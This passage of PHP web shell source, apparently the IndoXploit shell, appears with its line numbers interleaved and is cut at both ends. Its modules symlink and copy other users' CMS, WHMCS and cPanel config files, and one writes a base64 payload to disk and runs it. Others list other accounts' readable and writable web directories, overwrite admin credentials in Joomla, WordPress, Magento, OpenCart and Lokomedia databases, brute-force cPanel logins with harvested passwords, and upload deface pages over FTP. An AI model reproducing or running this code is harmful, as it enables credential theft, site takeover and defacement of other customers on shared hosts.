symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
604
		$file = "idx_config/vhost.cin";
605
		$handle = fopen($file ,"w+");
606
		fwrite($handle ,base64_decode($vhost));
607
		fclose($handle);
608
		chmod($file, 0755);
609
		if(exe("cd idx_config && ./vhost.cin")) {
610
			echo "<center><a href='$link_config/idx_config'><font color=lime>Done</font></a></center>";
611
		} else {
612
			echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=lime>Done</font></a></center>";
613
		}
614
615
	} else {
616
		$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
617
		while($passwd = fgets($etc)) {
618
			if($passwd == "" || !$etc) {
619
				echo "<font color=red>Can't read /etc/passwd</font>";
620
			} else {
621
				preg_match_all('/(.*?):x:/', $passwd, $user_config);
622
				foreach($user_config[1] as $user_idx) {
623
					$user_config_dir = "/home/$user_idx/public_html/";
624
					if(is_readable($user_config_dir)) {
625
						$grab_config = array(
626
							"/home/$user_idx/.my.cnf" => "cpanel",
627
							"/home/$user_idx/.accesshash" => "WHM-accesshash",
628
							"$user_config_dir/po-content/config.php" => "Popoji",
629
							"$user_config_dir/vdo_config.php" => "Voodoo",
630
							"$user_config_dir/bw-configs/config.ini" => "BosWeb",
631
							"$user_config_dir/config/koneksi.php" => "Lokomedia",
632
							"$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
633
							"$user_config_dir/clientarea/configuration.php" => "WHMCS",
634
							"$user_config_dir/whm/configuration.php" => "WHMCS",
635
							"$user_config_dir/whmcs/configuration.php" => "WHMCS",
636
							"$user_config_dir/forum/config.php" => "phpBB",
637
							"$user_config_dir/sites/default/settings.php" => "Drupal",
638
							"$user_config_dir/config/settings.inc.php" => "PrestaShop",
639
							"$user_config_dir/app/etc/local.xml" => "Magento",
640
							"$user_config_dir/joomla/configuration.php" => "Joomla",
641
							"$user_config_dir/configuration.php" => "Joomla",
642
							"$user_config_dir/wp/wp-config.php" => "WordPress",
643
							"$user_config_dir/wordpress/wp-config.php" => "WordPress",
644
							"$user_config_dir/wp-config.php" => "WordPress",
645
							"$user_config_dir/admin/config.php" => "OpenCart",
646
							"$user_config_dir/slconfig.php" => "Sitelok",
647
							"$user_config_dir/application/config/database.php" => "Ellislab");
648
						foreach($grab_config as $config => $nama_config) {
649
							$ambil_config = file_get_contents($config);
650
							if($ambil_config == '') {
651
							} else {
652
								$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
653
								fputs($file_config,$ambil_config);
654
							}
655
						}
656
					}		
657
				}
658
			}	
659
		}
660
	echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
661
	}
662
} elseif($_GET['do'] == 'jumping') {
663
	$i = 0;
664
	echo "<div class='margin: 5px auto;'>";
665
	if(preg_match("/hsphere/", $dir)) {
666
		$urls = explode("\r\n", $_POST['url']);
667
		if(isset($_POST['jump'])) {
668
			echo "<pre>";
669
			foreach($urls as $url) {
670
				$url = str_replace(array("http://","www."), "", strtolower($url));
671
				$etc = "/etc/passwd";
672
				$f = fopen($etc,"r");
673
				while($gets = fgets($f)) {
674
					$pecah = explode(":", $gets);
675
					$user = $pecah[0];
676
					$dir_user = "/hsphere/local/home/$user";
677
					if(is_dir($dir_user) === true) {
678
						$url_user = $dir_user."/".$url;
679
						if(is_readable($url_user)) {
680
							$i++;
681
							$jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
682
							if(is_writable($url_user)) {
683
								$jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
684
							}
685
							echo $jrw."<br>";
686
						}
687
					}
688
				}
689
			}
690
		if($i == 0) { 
691
		} else {
692
			echo "<br>Total ada ".$i." Kamar di ".$ip;
693
		}
694
		echo "</pre>";
695
		} else {
696
			echo '<center>
697
				  <form method="post">
698
				  List Domains: <br>
699
				  <textarea name="url" style="width: 500px; height: 250px;">';
700
			$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
701
			while($getss = fgets($fp)) {
702
				echo $getss;
703
			}
704
			echo  '</textarea><br>
705
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
706
				  </form></center>';
707
		}
708
	} elseif(preg_match("/vhosts|vhost/", $dir)) {
709
		preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
710
		$urls = explode("\r\n", $_POST['url']);
711
		if(isset($_POST['jump'])) {
712
			echo "<pre>";
713
			foreach($urls as $url) {
714
				$url = str_replace("www.", "", $url);
715
				$web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
716
				if(is_dir($web_vh) === true) {
717
					if(is_readable($web_vh)) {
718
						$i++;
719
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
720
						if(is_writable($web_vh)) {
721
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
722
						}
723
						echo $jrw."<br>";
724
					}
725
				}
726
			}
727
		if($i == 0) { 
728
		} else {
729
			echo "<br>Total ada ".$i." Kamar di ".$ip;
730
		}
731
		echo "</pre>";
732
		} else {
733
			echo '<center>
734
				  <form method="post">
735
				  List Domains: <br>
736
				  <textarea name="url" style="width: 500px; height: 250px;">';
737
				  bing("ip:$ip");
738
			echo  '</textarea><br>
739
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
740
				  </form></center>';
741
		}
742
	} else {
743
		echo "<pre>";
744
		$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
745
		while($passwd = fgets($etc)) {
746
			if($passwd == '' || !$etc) {
747
				echo "<font color=red>Can't read /etc/passwd</font>";
748
			} else {
749
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
750
				foreach($user_jumping[1] as $user_idx_jump) {
751
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
752
					if(is_readable($user_jumping_dir)) {
753
						$i++;
754
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
755
						if(is_writable($user_jumping_dir)) {
756
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
757
						}
758
						echo $jrw;
759
						if(function_exists('posix_getpwuid')) {
760
							$domain_jump = file_get_contents("/etc/named.conf");	
761
							if($domain_jump == '') {
762
								echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
763
							} else {
764
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
765
								foreach($domains_jump[1] as $dj) {
766
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
767
									$user_jumping_url = $user_jumping_url['name'];
768
									if($user_jumping_url == $user_idx_jump) {
769
										echo " => ( <u>$dj</u> )<br>";
770
										break;
771
									}
772
								}
773
							}
774
						} else {
775
							echo "<br>";
776
						}
777
					}
778
				}
779
			}
780
		}
781
		if($i == 0) { 
782
		} else {
783
			echo "<br>Total ada ".$i." Kamar di ".$ip;
784
		}
785
		echo "</pre>";
786
	}
787
	echo "</div>";
788
} elseif($_GET['do'] == 'auto_edit_user') {
789
	if($_POST['hajar']) {
790
		if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
791
			echo "username atau password harus lebih dari 6 karakter";
792
		} else {
793
			$user_baru = $_POST['user_baru'];
794
			$pass_baru = md5($_POST['pass_baru']);
795
			$conf = $_POST['config_dir'];
796
			$scan_conf = scandir($conf);
797
			foreach($scan_conf as $file_conf) {
798
				if(!is_file("$conf/$file_conf")) continue;
799
				$config = file_get_contents("$conf/$file_conf");
800
				if(preg_match("/JConfig|joomla/",$config)) {
801
					$dbhost = ambilkata($config,"host = '","'");
802
					$dbuser = ambilkata($config,"user = '","'");
803
					$dbpass = ambilkata($config,"password = '","'");
804
					$dbname = ambilkata($config,"db = '","'");
805
					$dbprefix = ambilkata($config,"dbprefix = '","'");
806
					$prefix = $dbprefix."users";
807
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
808
					$db = mysql_select_db($dbname);
809
					$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
810
					$result = mysql_fetch_array($q);
811
					$id = $result['id'];
812
					$site = ambilkata($config,"sitename = '","'");
813
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
814
					echo "Config => ".$file_conf."<br>";
815
					echo "CMS => Joomla<br>";
816
					if($site == '') {
817
						echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
818
					} else {
819
						echo "Sitename => $site<br>";
820
					}
821
					if(!$update OR !$conn OR !$db) {
822
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
823
					} else {
824
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
825
					}
826
					mysql_close($conn);
827
				} elseif(preg_match("/WordPress/",$config)) {
828
					$dbhost = ambilkata($config,"DB_HOST', '","'");
829
					$dbuser = ambilkata($config,"DB_USER', '","'");
830
					$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
831
					$dbname = ambilkata($config,"DB_NAME', '","'");
832
					$dbprefix = ambilkata($config,"table_prefix  = '","'");
833
					$prefix = $dbprefix."users";
834
					$option = $dbprefix."options";
835
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
836
					$db = mysql_select_db($dbname);
837
					$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
838
					$result = mysql_fetch_array($q);
839
					$id = $result[ID];
840
					$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
841
					$result2 = mysql_fetch_array($q2);
842
					$target = $result2[option_value];
843
					if($target == '') {
844
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
845
					} else {
846
						$url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
847
					}
848
					$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
849
					echo "Config => ".$file_conf."<br>";
850
					echo "CMS => Wordpress<br>";
851
					echo $url_target;
852
					if(!$update OR !$conn OR !$db) {
853
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
854
					} else {
855
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
856
					}
857
					mysql_close($conn);
858
				} elseif(preg_match("/Magento|Mage_Core/",$config)) {
859
					$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
860
					$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
861
					$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
862
					$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
863
					$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
864
					$prefix = $dbprefix."admin_user";
865
					$option = $dbprefix."core_config_data";
866
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
867
					$db = mysql_select_db($dbname);
868
					$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
869
					$result = mysql_fetch_array($q);
870
					$id = $result[user_id];
871
					$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
872
					$result2 = mysql_fetch_array($q2);
873
					$target = $result2[value];
874
					if($target == '') {
875
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
876
					} else {
877
						$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
878
					}
879
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
880
					echo "Config => ".$file_conf."<br>";
881
					echo "CMS => Magento<br>";
882
					echo $url_target;
883
					if(!$update OR !$conn OR !$db) {
884
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
885
					} else {
886
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
887
					}
888
					mysql_close($conn);
889
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
890
					$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
891
					$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
892
					$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
893
					$dbname = ambilkata($config,"'DB_DATABASE', '","'");
894
					$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
895
					$prefix = $dbprefix."user";
896
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
897
					$db = mysql_select_db($dbname);
898
					$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
899
					$result = mysql_fetch_array($q);
900
					$id = $result[user_id];
901
					$target = ambilkata($config,"HTTP_SERVER', '","'");
902
					if($target == '') {
903
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
904
					} else {
905
						$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
906
					}
907
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
908
					echo "Config => ".$file_conf."<br>";
909
					echo "CMS => OpenCart<br>";
910
					echo $url_target;
911
					if(!$update OR !$conn OR !$db) {
912
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
913
					} else {
914
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
915
					}
916
					mysql_close($conn);
917
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
918
					$dbhost = ambilkata($config,'server = "','"');
919
					$dbuser = ambilkata($config,'username = "','"');
920
					$dbpass = ambilkata($config,'password = "','"');
921
					$dbname = ambilkata($config,'database = "','"');
922
					$prefix = "users";
923
					$option = "identitas";
924
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
925
					$db = mysql_select_db($dbname);
926
					$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
927
					$result = mysql_fetch_array($q);
928
					$target = $result[alamat_website];
929
					if($target == '') {
930
						$target2 = $result[url];
931
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
932
						if($target2 == '') {
933
							$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
934
						} else {
935
							$cek_login3 = file_get_contents("$target2/adminweb/");
936
							$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
937
							if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
938
								$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
939
							} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
940
								$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
941
							} else {
942
								$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
943
							}
944
						}
945
					} else {
946
						$cek_login = file_get_contents("$target/adminweb/");
947
						$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
948
						if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
949
							$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
950
						} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
951
							$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
952
						} else {
953
							$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
954
						}
955
					}
956
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
957
					echo "Config => ".$file_conf."<br>";
958
					echo "CMS => Lokomedia<br>";
959
					if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
960
						echo $url_target2;
961
					} else {
962
						echo $url_target;
963
					}
964
					if(!$update OR !$conn OR !$db) {
965
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
966
					} else {
967
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
968
					}
969
					mysql_close($conn);
970
				}
971
			}
972
		}
973
	} else {
974
		echo "<center>
975
		<h1>Auto Edit User Config</h1>
976
		<form method='post'>
977
		DIR Config: <br>
978
		<input type='text' size='50' name='config_dir' value='$dir'><br><br>
979
		Set User & Pass: <br>
980
		<input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
981
		<input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
982
		<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
983
		</form>
984
		<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
985
		";
986
	}
987
} elseif($_GET['do'] == 'cpanel') {
988
	if($_POST['crack']) {
989
		$usercp = explode("\r\n", $_POST['user_cp']);
990
		$passcp = explode("\r\n", $_POST['pass_cp']);
991
		$i = 0;
992
		foreach($usercp as $ucp) {
993
			foreach($passcp as $pcp) {
994
				if(@mysql_connect('localhost', $ucp, $pcp)) {
995
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
996
					} else {
997
						$_SESSION[$ucp] = "1";
998
						$_SESSION[$pcp] = "1";
999
						if($ucp == '' || $pcp == '') {
1000
							
1001
						} else {
1002
							$i++;
1003
							if(function_exists('posix_getpwuid')) {
1004
								$domain_cp = file_get_contents("/etc/named.conf");	
1005
								if($domain_cp == '') {
1006
									$dom =  "<font color=red>gabisa ambil nama domain nya</font>";
1007
								} else {
1008
									preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1009
									foreach($domains_cp[1] as $dj) {
1010
										$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1011
										$user_cp_url = $user_cp_url['name'];
1012
										if($user_cp_url == $ucp) {
1013
											$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1014
											break;
1015
										}
1016
									}
1017
								}
1018
							} else {
1019
								$dom = "<font color=red>function is Disable by system</font>";
1020
							}
1021
							echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1022
						}
1023
					}
1024
				}
1025
			}
1026
		}
1027
		if($i == 0) {
1028
		} else {
1029
			echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
1030
		}
1031
	} else {
1032
		echo "<center>
1033
		<form method='post'>
1034
		USER: <br>
1035
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
1036
		$_usercp = fopen("/etc/passwd","r");
1037
		while($getu = fgets($_usercp)) {
1038
			if($getu == '' || !$_usercp) {
1039
				echo "<font color=red>Can't read /etc/passwd</font>";
1040
			} else {
1041
				preg_match_all("/(.*?):x:/", $getu, $u);
1042
				foreach($u[1] as $user_cp) {
1043
						if(is_dir("/home/$user_cp/public_html")) {
1044
							echo "$user_cp\n";
1045
					}
1046
				}
1047
			}
1048
		}
1049
		echo "</textarea><br>
1050
		PASS: <br>
1051
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1052
		function cp_pass($dir) {
1053
			$pass = "";
1054
			$dira = scandir($dir);
1055
			foreach($dira as $dirb) {
1056
				if(!is_file("$dir/$dirb")) continue;
1057
				$ambil = file_get_contents("$dir/$dirb");
1058
				if(preg_match("/WordPress/", $ambil)) {
1059
					$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1060
				} elseif(preg_match("/JConfig|joomla/", $ambil)) {
1061
					$pass .= ambilkata($ambil,"password = '","'")."\n";
1062
				} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1063
					$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1064
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1065
					$pass .= ambilkata($ambil,'password = "','"')."\n";
1066
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1067
					$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1068
				} elseif(preg_match("/^[client]$/", $ambil)) {
1069
					preg_match("/password=(.*?)/", $ambil, $pass1);
1070
					if(preg_match('/"/', $pass1[1])) {
1071
						$pass1[1] = str_replace('"', "", $pass1[1]);
1072
						$pass .= $pass1[1]."\n";
1073
					} else {
1074
						$pass .= $pass1[1]."\n";
1075
					}
1076
				} elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1077
					$pass .= ambilkata($ambil,"db_password = '","'")."\n";
1078
				}
1079
			}
1080
			echo $pass;
1081
		}
1082
		$cp_pass = cp_pass($dir);
1083
		echo $cp_pass;
1084
		echo "</textarea><br>
1085
		<input type='submit' name='crack' style='width: 450px;' value='Crack'>
1086
		</form>
1087
		<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1088
	}
1089
} elseif($_GET['do'] == 'cpftp_auto') {
1090
	if($_POST['crack']) {
1091
		$usercp = explode("\r\n", $_POST['user_cp']);
1092
		$passcp = explode("\r\n", $_POST['pass_cp']);
1093
		$i = 0;
1094
		foreach($usercp as $ucp) {
1095
			foreach($passcp as $pcp) {
1096
				if(@mysql_connect('localhost', $ucp, $pcp)) {
1097
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1098
					} else {
1099
						$_SESSION[$ucp] = "1";
1100
						$_SESSION[$pcp] = "1";
1101
						if($ucp == '' || $pcp == '') {
1102
							//
1103
						} else {
1104
							echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1105
							$ftp_conn = ftp_connect($ip);
1106
							$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1107
							if((!$ftp_login) || (!$ftp_conn)) {
1108
								echo "[+] <font color=red>Login Gagal</font><br><br>";
1109
							} else {
1110
								echo "[+] <font color=lime>Login Sukses</font><br>";
1111
								$fi = htmlspecialchars($_POST['file_deface']);
1112
								$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1113
								if($deface) {
1114
									$i++;
1115
									echo "[+] <font color=lime>Deface Sukses</font><br>";
1116
									if(function_exists('posix_getpwuid')) {
1117
										$domain_cp = file_get_contents("/etc/named.conf");	
1118
										if($domain_cp == '') {
1119
											echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1120
										} else {
1121
											preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1122
											foreach($domains_cp[1] as $dj) {
1123
												$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1124
												$user_cp_url = $user_cp_url['name'];
1125
												if($user_cp_url == $ucp) {
1126
													echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1127
													break;
1128
												}
1129
											}
1130
										}
1131
									} else {
1132
										echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1133
									}
1134
								} else {
1135
									echo "[-] <font color=red>Deface Gagal</font><br><br>";
1136
								}
1137
							}
1138
							//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
1139
						}
1140
					}
1141
				}
1142
			}
1143
		}
1144
		if($i == 0) {
1145
		} else {
1146
			echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
1147
		}
1148
	} else {
1149
		echo "<center>
1150
		<form method='post'>
1151
		Filename: <br>
1152
		<input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1153
		Deface Page: <br>
1154
		<input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1155
		USER: <br>
1156
